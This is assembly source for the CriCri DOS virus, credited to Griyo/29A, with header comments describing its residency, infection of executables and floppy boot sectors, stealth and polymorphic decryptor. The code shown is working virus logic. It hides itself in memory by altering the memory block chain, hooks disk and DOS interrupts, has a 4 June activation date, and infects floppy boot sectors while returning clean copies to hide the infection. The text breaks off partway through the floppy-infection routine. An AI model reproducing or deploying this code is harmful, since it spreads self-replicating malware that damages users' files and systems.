📄 cricri.asm
;----------------------------------------------------------------------------
;CRI-CRI ViRuS (CoDe by Griyo/29A)
;----------------------------------------------------------------------------

;ResiDenT:

;WheN an inFecTed FiLe is Run thE viRus becaMes ResidEnt inTo a UMB
;memoRy bloCk (if aVaiLabLe) or in conVenTionaL memOry. Then iT
;hOOks int13h and int21h.

;InfEcTion (MulTiPartite):

;CriCri wRitEs itSeLf to The End of .Com and .Exe fiLes that aRe eXecUtEd 
;or cLosEd aNd to The BooT SectOr of fLoppY diSks tHat are accEssed. During
;fiLe iNfeCtion the viRus UseS LoW LeveL SysTem fiLe tabLe and HookS
;int03h and int24h.
;CriCri doEs not inFect the fiLes thAt havE diGit or V chaRactErs in 
;thEir namEs As weLL as FiLes with toDays DatE and SomE antiVirUs 
;eXecuTablEs. InfEcted fiLes Have 62 seCondS in tHeir tiMe sTamp.

;SteALth (fiLe and booT LeveL):

;CriCri reTurNs cLean CopiEs oF inFected fiLes tHat are acceSsed and hide
;theiR tRue siZe. The viRus alSo reTurns the OriGinaL boot sEctoR of
;fLoppy disKs tHat aRe read. The viRus disabLes his sTeaLth mechaNism
;when some comPressiOn utiLities are beinG eXecuted.

;PoLymorPhic:

;The viRus is polymorPHic in fiLes and bOOt secToRs. GenerAted PolymorPHic
;deCrypToR conTains conDitiOnaL and AbsoluTe jumPs as WeLL as subRoutiNes
;and inteRRupt caLLs.

;----------------------------------------------------------------------------
com     segment para 'CODE'
        assume cs:com,ds:com,es:com,ss:com
;----------------------------------------------------------------------------
;Virus size in bytes
lenvir          equ virus_copy-virus_entry    
;Virus size in para
para_size       equ ((lenvir*02h)+0Fh)/10h
;Virus size in sectors
sector_size     equ ((lenvir+1FFh)/200h)
;Decryptor size in bytes
decryptor       equ (virus_body-virus_entry)
;Boot code size in bytes
boot_size       equ (boot_end-boot_code)
;----------------------------------------------------------------------------
;Create .COM launcher: TASM cricri.asm TLINK /t cricri.obj
        org 100h
;----------------------------------------------------------------------------
;Virus entry point
;----------------------------------------------------------------------------
virus_entry:
;Store bp for launcher
        sub bp,bp
;Buffer were virus build polymorphic decryptor
        db 0280h dup (90h)
virus_body:        
;Save segment registers
        push ds
        push es
;Check if running from boot or file        
        mov al,byte ptr cs:[prog_type][bp]
        cmp al,"B"
        je in_boot_sector
        jmp go_ahead
;----------------------------------------------------------------------------
;Virus working from boot sector
;----------------------------------------------------------------------------
in_boot_sector:
;Reset DOS loaded flag
        mov byte ptr cs:[dos_flag][bp],00h
;Clear dos running switch
        mov byte ptr cs:[running_sw],"R"
;Get int 13h vector
        mov al,13h
        call get_int
;Save old int 13h
        mov word ptr cs:[old13h_off][bp],bx
        mov word ptr cs:[old13h_seg][bp],es
;Calculate our segment position
        mov ax,cs
        sub ax,10h
        mov ds,ax
;Hook int 13h
        mov al,13h
        mov dx,offset my_int13h
        call set_int
;Restore segment registers
        pop es
        pop ds
;Reboot system
        int 19h
;----------------------------------------------------------------------------
;Wait until dos is loaded
;----------------------------------------------------------------------------
wait_dos:
;Hook int 21h at installation check
test_1:
        cmp ah,01h
        jne test_2
        cmp si,00BADh
        jne test_2
        cmp di,0FACEh
        je dos_installed
;Hook int 21h if we detect a write operation
test_2:
        cmp ah,03h
        je dos_installed
        ret
;Hook int 21h to our handler
dos_installed:
        call push_all
;Set dos loaded flag        
        mov byte ptr cs:[dos_flag],0FFh
;Check dos version
        mov ah,30h
        int 21h
        cmp al,04h
        jb exit_wait
;Save old int 21h vector
        mov al,21h
        call get_int
        mov word ptr cs:[old21h_off],bx
        mov word ptr cs:[old21h_seg],es
;Get our segment
        push cs
        pop ds
;Point int 21h to our handler
        mov dx,offset my_int21h
        mov al,21h
        call set_int
exit_wait:
        call pop_all
        ret
;----------------------------------------------------------------------------
;Running from an executable
;----------------------------------------------------------------------------
go_ahead:
;Installation check
        mov si,00BADh
        mov di,0FACEh
        mov ah,01h
        mov dl,80h
        int 13h
        jc not_installed
        cmp si,0DEADh
        jne not_installed
        cmp di,0BABEh
        jne not_installed
        jmp control_end
not_installed:
;Check dos version
        mov ah,30h
        int 21h
        cmp al,04h
        jae check_date
        jmp control_end
check_date:
;Get current date
        mov ah,2Ah
        int 21h
;Save today's date
        mov byte ptr cs:[today][bp],dl
;Activation circunstance: 4th of June
        cmp dh,06h
        jne no_activation
        cmp dl,04h
        jne no_activation
        jmp print_credits
no_activation:
;Set dos loaded flag        
        xor al,al
        dec al
        mov byte ptr cs:[dos_flag][bp],al
;Clear dos running switch
        mov byte ptr cs:[running_sw],"R"
;Save old int 13h
        mov al,13h
        call get_int
        mov word ptr cs:[old13h_seg][bp],es
        mov word ptr cs:[old13h_off][bp],bx
;Save old int 03h
        mov al,03h
        call get_int
        mov word ptr cs:[old03h_seg][bp],es
        mov word ptr cs:[old03h_off][bp],bx
;Save old int 21h
        mov al,21h
        call get_int
        mov word ptr cs:[old21h_seg][bp],es
        mov word ptr cs:[old21h_off][bp],bx
;Redirect traced int 21h to int 03h
        lds dx,dword ptr cs:[old21h][bp]
        mov al,03h
        call set_int
;----------------------------------------------------------------------------
;Memory allocation
;----------------------------------------------------------------------------
        sub di,di
;Get pointer to dos info block
        mov ah,52h
        int 03h
;Get pointer to the dos buffers structure
        lds si,es:[bx+12h]
;Get address of first umb
        mov ax,ds:[si+1Fh]
        cmp ax,0FFFFh
        je no_umbs
;Follow the chain
nextumb:        
        mov ds,ax
;Check for free umb's
        cmp word ptr ds:[di+01h],di
        jnz no_free_umb
;Check if there is enought size
        cmp word ptr ds:[di+03h],para_size+01h
        ja handle_mcb
no_free_umb:
;Check if this is the last umb
        cmp byte ptr ds:[di+00h],"Z"
        je no_umbs
;Jump to next umb in the chain
        mov ax,ds
        inc ax
        add ax,word ptr ds:[di+03h]
        mov ds,ax
        jmp short nextumb
;Allocate memory from last mcb
no_umbs:
;Get pointer to dos info block
        mov ah,52h
        int 03h
;Get pointer to first mcb
        mov ax,es
        dec ax
        mov es,ax
        add bx,12
        lds di,dword ptr es:[bx+00h]
;Follow the mcb chain
nextmcb:
;Check if this is the last mcb
        cmp byte ptr ds:[di+00h],"Z"
        je ok_mcb
;Next mcb
        mov ax,ds
        inc ax
        add ax,word ptr ds:[di+03h]
        mov ds,ax
        jmp short nextmcb
ok_mcb:
;Check mcb size        
        cmp word ptr ds:[di+03h],para_size+4000h
        ja ok_mcb_size
        jmp control_end
ok_mcb_size:        
;Sub top of memory in psp
        sub word ptr ds:[di+12h],para_size+01h
handle_mcb:
;Sub virus size and mcb size
        sub word ptr ds:[di+03h],para_size+01h
;Clear the last mcb field
        mov byte ptr ds:[di+00h],"M"
;Jump to next mcb
        mov ax,ds
        inc ax
        add ax,word ptr ds:[di+03h]
        mov es,ax
        inc ax
        push ax
;Mark mcb as last in the chain
        mov byte ptr es:[di+00h],"Z"
;Set dos as owner
        mov word ptr es:[di+01h],0008h
;Set mcb size
        mov word ptr es:[di+03h],para_size
;Mark UMB as system code
        mov di,0008h
        mov ax,"CS"
        cld
        stosw
        xor ax,ax
        stosw
        stosw
        stosw
;Copy to memory
        pop es
        mov ax,cs
        mov ds,ax
        sub di,di
        mov si,bp        
        add si,0100h
        mov cx,lenvir
        cld
        rep movsb
;Save virus segment
        mov ax,es
        sub ax,10h
        mov ds,ax
;Hook int 13h
        mov dx,offset my_int13h
        mov al,13h
        call set_int
;Hook int 21h
        mov dx,offset my_int21h
        mov al,21h
        call set_int
control_end:
;Restore old int 03h        
        lds dx,dword ptr cs:[old03h][bp]
        mov al,03h
        call set_int
;Return to host
        cmp byte ptr cs:[prog_type][bp],"E"
        je exit_exe
;----------------------------------------------------------------------------
;Exit from .COM
;----------------------------------------------------------------------------
exit_com:
;Restore first three bytes
        mov ax,cs
        mov es,ax
        mov ds,ax
        mov si,offset old_header
        add si,bp 
        mov di,0100h
        mov cx,0003h
        cld
        rep movsb
;Restore segment registers
        pop es
        pop ds
;Check if launcher execution
        cmp bp,0000h
        je endprog
;Get control back to host
        push cs
        mov ax,0100h
        push ax
        call zero_all
        retf
;Exit program if launcher execution
endprog:
        mov ax,4C00h
        int 21h
;----------------------------------------------------------------------------
;Exit from .EXE
;----------------------------------------------------------------------------
exit_exe:
;Restore segment registers
        pop es
        pop ds
;Get control back to host
        mov bx,word ptr cs:[file_buffer+16h][bp]
        mov ax,cs
        sub ax,bx
        mov dx,ax
        add ax,word ptr cs:[old_header+16h][bp]
        add dx,word ptr cs:[old_header+0Eh][bp]
        mov bx,word ptr cs:[old_header+14h][bp]
        mov word ptr cs:[exeret][bp],bx
        mov word ptr cs:[exeret+02h][bp],ax
        mov ax,word ptr cs:[old_header+10h][bp]
        mov word ptr cs:[fix1][bp],dx
        mov word ptr cs:[fix2][bp],ax
        call zero_all
        db 0B8h
fix1:
        dw 0000h
        cli
        mov ss,ax
        db 0BCh
fix2:
        dw 0000h
        sti
        db 0EAh
exeret:
        dw 0000h
        dw 0000h
;----------------------------------------------------------------------------
;Virus int 13h handler
;----------------------------------------------------------------------------
my_int13h:
        cmp byte ptr cs:[dos_flag],00h
        jne ok_dos_flag
        call wait_dos
ok_dos_flag:
        call push_all
;Installation check
        cmp ah,01h
        jnz not_check
        cmp si,00BADh
        jne my13h_exit
        cmp di,0FACEh
        jne my13h_exit
        call pop_all
        mov si,0DEADh
        mov di,0BABEh
        stc
        cmc
        retf 2
not_check:
;Do not use our int 13h handler if we are using our int 21h handler
        cmp byte ptr cs:[running_sw],"R"
        jne my13h_exit
;Check for read operations
        cmp ah,02h
        jne short my13h_exit
;Side 0 of drive a:
        or dx,dx
        jnz short my13h_exit
;Track 0, sector 1
        cmp cx,0001h
        je infect_floppy
;Get control back to old int 13h
my13h_exit:
        call pop_all
        jmp dword ptr cs:[old13h]
;----------------------------------------------------------------------------
;Infect floppy on drive a:
;----------------------------------------------------------------------------
infect_floppy:
;Perform read operation
        pushf
        call dword ptr cs:[old13h]
        jnc boot_read_ok
        call pop_all
        stc
        retf 2
boot_read_ok:
;Check for JMP SHORT at the beginning
        cmp byte ptr es:[bx+00h],0EBh
        jne exit_disk
;Check if infected
        call get_position
        cmp word ptr es:[di+boot_marker-boot_code],"RC"
        jne not_infected
        jmp stealth_boot
not_infected:
;Check for mbr marker also in floppy
        cmp word ptr es:[bx+01FEh],0AA55h
        je floppy_infection
exit_disk:
        call pop_all
        stc
        cmc
        retf 2
;Calculate track and head for floppy
floppy_infection:
;Get sectors per track
        mov ax,word ptr es:[bx+18h]
        mov cx,ax
;Cut one track for virus body
        sub word ptr es:[bx+13h],ax
        mov ax,word ptr es:[bx+13h]
        xor dx,dx
;Divide total sectors by sectors per track
        div cx
        xor dx,dx
